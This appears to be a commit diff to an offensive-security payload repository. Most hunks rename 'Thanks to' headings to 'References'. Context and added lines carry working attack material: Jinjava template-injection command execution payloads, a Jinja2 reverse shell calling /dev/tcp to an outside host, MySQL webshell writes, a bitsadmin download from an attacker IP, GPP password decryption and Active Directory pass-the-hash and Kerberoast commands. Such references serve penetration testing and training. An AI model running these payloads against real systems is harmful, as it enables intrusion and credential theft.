Adding references sectio

AWS Amazon Bucket S3/README.md

@@ -149,7 +149,7 @@ List of Fortune1000 company names with permutations on .com, -backup, -media. Fo
 List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
 ```
 
-## Thanks to
+## References
 
 * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
 * https://digi.ninja/projects/bucket_finder.php

CRLF injection/README.md

@@ -95,7 +95,7 @@ Remainder:
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)
 
-## Thanks to
+## References
 
 * https://www.owasp.org/index.php/CRLF_Injection
 * https://vulners.com/hackerone/H1:192749

CSV injection/README.md

@@ -25,7 +25,7 @@ Any formula can be started with
 @
 ```
 
-## Thanks to
+## References
 
 * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
 * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)

File Inclusion - Path Traversal/README.md

@@ -339,7 +339,7 @@ Use the LFI to include the PHP session file
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
 
-## Thanks to
+## References
 
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)

Insecure deserialization/Java.md

@@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget
 
 JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
 
-## Thanks to
+## References
 
 - [Github - ysoserial](https://github.com/frohoff/ysoserial)
 - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)

Insecure deserialization/PHP.md

@@ -153,7 +153,7 @@ phpggc monolog/rce1 'phpinfo();' -s
 * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
 * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
 
-## Thanks to
+## References
 
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)

Insecure deserialization/Python.md

@@ -44,7 +44,7 @@ evil_token = b64encode(cPickle.dumps(e))
 print("Your Evil Token : {}").format(evil_token)
 ```
 
-## Thanks to
+## References
 
 * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
 * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)

Insecure deserialization/README.md

@@ -9,7 +9,7 @@ Check the following sub-sections, located in other files :
 * [Ruby : universal rce gadget, ...](Ruby.md)
 * [Python : pickle, ...](Python.md)
 
-## Thanks to
+## References
 
 * [Github - ysoserial](https://github.com/frohoff/ysoserial)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)

Insecure deserialization/Ruby.md

@@ -6,7 +6,7 @@ Script to generate and verify the deserialization gadget chain against Ruby 2.0
 for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
 ```
 
-## Thanks to
+## References
 
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)

Insecure direct object references/README.md

@@ -41,7 +41,7 @@ http://foo.bar/accessPage?menuitem=12
 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
 * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
 
-## Thanks to
+## References
 
 * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
 * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)

Insecure management interface/README.md

@@ -2,8 +2,18 @@
 
 ## Springboot-Actuator
 
-Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. Some of them contains sensitive info such as `/trace` (by default the last 100 HTTP requests with headers), `/env` (the current environment properties) or `/heapdump` (builds and returns a heap dump from the JVM used by our application). These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
+Actuator endpoints let you monitor and interact with your application. 
+Spring Boot includes a number of built-in endpoints and lets you add your own. 
+For example, the health endpoint provides basic application health information. 
+Some of them contains sensitive info such as :
 
-the official documentation is located [here](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
+- `/trace` (by default the last 100 HTTP requests with headers)
+- `/env` (the current environment properties)
+- `/heapdump` (builds and returns a heap dump from the JVM used by our application). 
 
-## Thanks to
+These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
+
+
+## References
+
+* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)

Insecure source code management/README.md

@@ -167,7 +167,7 @@ git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 
-## Thanks to
+## References
 
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
 - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)

JSON Web Token/README.md

@@ -136,7 +136,7 @@ Secret is "Sn1f"
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 ```
 
-## Thanks
+## References
 
 - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
 - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)

LDAP injection/README.md

@@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx
 userPassword:2.5.13.18:=\xx\xx\xx
 ```
 
-## Thanks to
+## References
 
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)

LaTeX injection/README.md

@@ -66,7 +66,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
 \input{|"/bin/hostname"}
 ```
 
-## Thanks to
+## References
 
 * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
 * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)

Methodology and Resources/Active Directory Attack.md

@@ -84,8 +84,8 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
-ls # list files
-cd 
+ls  # list files
+cd  # move inside a folder
 get # download files
 put # replace a file
 ```
@@ -94,6 +94,18 @@ or
 
 ```powershell
 smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
+        Sharename       Type      Comment
+        ---------       ----      -------
+        ADMIN$          Disk      Remote Admin
+        C$              Disk      Default share
+        IPC$            IPC       Remote IPC
+        NETLOGON        Disk      Logon server share
+        Replication     Disk      
+        SYSVOL          Disk      Logon server share
+        Users           Disk
+use Sharename # select a Sharename
+cd Folder     # move inside a folder
+ls            # list files
 ```
 
 Mount a share
@@ -117,7 +129,10 @@ Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter
 ```bash
 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 
-e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+e.g: 
+echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+
+echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 ```
 
 Metasploit modules to enumerate shares and credentials
@@ -319,7 +334,7 @@ TODO
 ### Kerberoast
 
 ```powershell
-GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
+$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
 
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 
@@ -337,11 +352,6 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 
-
-- https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
-- https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
-- https://room362.com/post/2016/kerberoast-pt1/
-
 ### Pass-the-Hash
 
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
@@ -463,7 +473,7 @@ net user hacker2 hacker123 /add /Domain
 net group "Domain Admins" hacker2 /add /domain
 ```
 
-## Documentation / Thanks to
+## References
 
 * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
@@ -490,4 +500,7 @@ net group "Domain Admins" hacker2 /add /domain
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
 * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
 * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
-* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
+* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)

Methodology and Resources/Linux - Persistence.md

@@ -121,7 +121,7 @@ The following directories are temporary and usually writeable
 /dev/shm/
 ```
 
-## Thanks to
+## References
 
 * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
 * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)

Methodology and Resources/Metasploit CheatSheet.md

@@ -158,6 +158,6 @@ Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 3
 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
 * MS08_67 - `exploit/windows/smb/ms08_067_netapi`
 
-## Thanks to
+## References
 
 * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)

Methodology and Resources/Methodology_and_enumeration.md

@@ -268,7 +268,7 @@ International test card numbers and tokens
 | 4000002460000001 | tok_fi         | Finland (FI)   | Visa           |
 | 4000002500000003 | tok_fr         | France (FR)    | Visa           |
 
-## Thanks to
+## References
 
 * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
 * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)

Methodology and Resources/Network Discovery.md

@@ -135,6 +135,6 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 
-## Thanks
+## References
 
 * [TODO](TODO)

Methodology and Resources/Network Pivoting Techniques.md

@@ -165,7 +165,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
 
-## Thanks to
+## References
 
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -223,7 +223,7 @@ stty rows <num> columns <cols>
 !sh
 ```
 
-## Thanks to
+## References
 
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

Methodology and Resources/Subdomains Enumeration.md

@@ -177,7 +177,7 @@ go get github.com/Ice3man543/SubOver
 ./SubOver -l subdomains.txt
 ```
 
-## Thanks
+## References
 
 * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
 * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)

Methodology and Resources/Windows - Download and Execute.md

@@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>
 ```
 
 
-## Thanks to
+## References
 
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

Methodology and Resources/Windows - Mimikatz.md

@@ -85,7 +85,7 @@ More informations can be grabbed from the Memory with :
 
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
 
-## Thanks to
+## References
 
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)

Methodology and Resources/Windows - Persistence.md

@@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
-## Thanks to
+## References
 
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)

Methodology and Resources/Windows - Post Exploitation Koadic.md

@@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
 
-## Thanks
+## References
 
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -206,7 +206,7 @@ wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 
-## Thanks to
+## References
 
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

Methodology and Resources/Windows - Using credentials.md

@@ -137,7 +137,7 @@ PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
 ```
 
-## Thanks
+## References
 
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)

NoSQL injection/README.md

@@ -84,7 +84,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 [$ne]=1
 ```
 
-## Thanks to
+## References
 
 * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)

OAuth/README.md

@@ -46,7 +46,7 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
 
 > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
 
-## Thanks to
+## References
 
 * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
 * [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)

Open redirect/README.md

@@ -124,7 +124,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
 ?return_path={payload}
 ```
 
-## Thanks to
+## References
 
 * filedescriptor
 * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)

PHP juggling type/README.md

@@ -56,7 +56,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
 ?>
 ```
 
-## Thanks to
+## References
 
 * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
 * [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)

Remote commands execution/README.md

@@ -156,7 +156,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
 
-## Thanks to
+## References
 
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)

SQL injection/Cassandra Injection.md

@@ -32,6 +32,6 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT
 
 Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
 
-## Thanks to
+## References
 
 * [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)

SQL injection/MSSQL Injection.md

@@ -119,7 +119,7 @@ RECONFIGURE
 EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ```
 
-## Thanks to
+## References
 
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)

SQL injection/MySQL Injection.md

@@ -125,3 +125,5 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
+
+## References

SQL injection/OracleSQL Injection.md

@@ -91,6 +91,6 @@ EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f7220726570
 SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ```
 
-## Thanks to
+## References
 
 * [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)

SQL injection/PostgreSQL Injection.md

@@ -44,6 +44,6 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 
-## Thanks to
+## References
 
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)

SQL injection/README.md

@@ -460,7 +460,7 @@ mysql> mysql> select version();
 +-------------------------+
 ```
 
-## Thanks to - Other resources
+## References
 
 * Detect SQLi
   * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)

SQL injection/SQLite Injection.md

@@ -73,6 +73,6 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
 
 Note: By default this component is disabled
 
-## Thanks to
+## References
 
 [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)

SSRF injection/README.md

@@ -470,7 +470,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
 - [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
 
-## Thanks to
+## References
 
 - [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 - [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)

Server Side Template injections/README.md

@@ -11,6 +11,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```
 
+## Methodology
+
+![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true)
+
 ## Ruby
 
 ### Basic injection
@@ -141,7 +145,7 @@ ${x}
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 
-### Jinja 2 - Basic injection
+### Jinja2 - Basic injection
 
 ```python
 {{4*4}}[[5*5]]
@@ -211,6 +215,33 @@ Inject this template
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 
+## Jinjava
+
+
+### Jinjava - Basic injection
+
+```python
+{{'a'.toUpperCase()}} would result in 'A'
+{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
+```
+
+Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
+
+### Jinjava - Command execution 
+
+Fixed by https://github.com/HubSpot/jinjava/pull/230
+
+```python
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+
+
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+```
+
 ## Client Side Template Injection
 
 ### AngularJS
@@ -226,7 +257,7 @@ $eval('1+1')
 {{constructor.constructor('alert(1)')()}}
 ```
 
-## Thanks to
+## References
 
 * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
 * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
@@ -235,4 +266,5 @@ $eval('1+1')
 * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
 * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
 * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
-* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
+* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
+* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)

Tar commands execution/README.md

@@ -12,7 +12,7 @@ These files work against a "tar *"
 shell.sh   (your exploit code is here)
 ```
 
-## Thanks to
+## References
 
 * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
 * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)

Traversal directory/README.md

@@ -43,6 +43,6 @@ UTF-8 Unicode encoding
 \ = %c0%5c, %c0%80%5c
 ```
 
-## Thanks to
+## References
 
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)

Upload insecure files/README.md

@@ -59,6 +59,6 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e
 IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
 ```
 
-## Thanks to
+## References
 
 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil

Web cache deception/README.md

@@ -50,7 +50,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
     ```
 
 
-## Thanks to
+## References
 
 * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
 * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)

XPATH injection/README.md

@@ -33,7 +33,7 @@ substring(//user[userid=5]/username,2,1)=CHAR_HERE
 substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
 ```
 
-## Thanks to
+## References
 
 * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
 * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)

XSS injection/README.md

@@ -859,7 +859,7 @@ Notification.requestPermission(x=>{new(Notification)(1)})
 
 Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
 
-## Thanks to
+## References
 
 - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
 - tbm

XSS injection/XSS in Angular.md

@@ -149,6 +149,6 @@ Vue JS
 {{constructor.constructor('alert(1)')()}}
 ```
 
-## Thanks
+## References
 
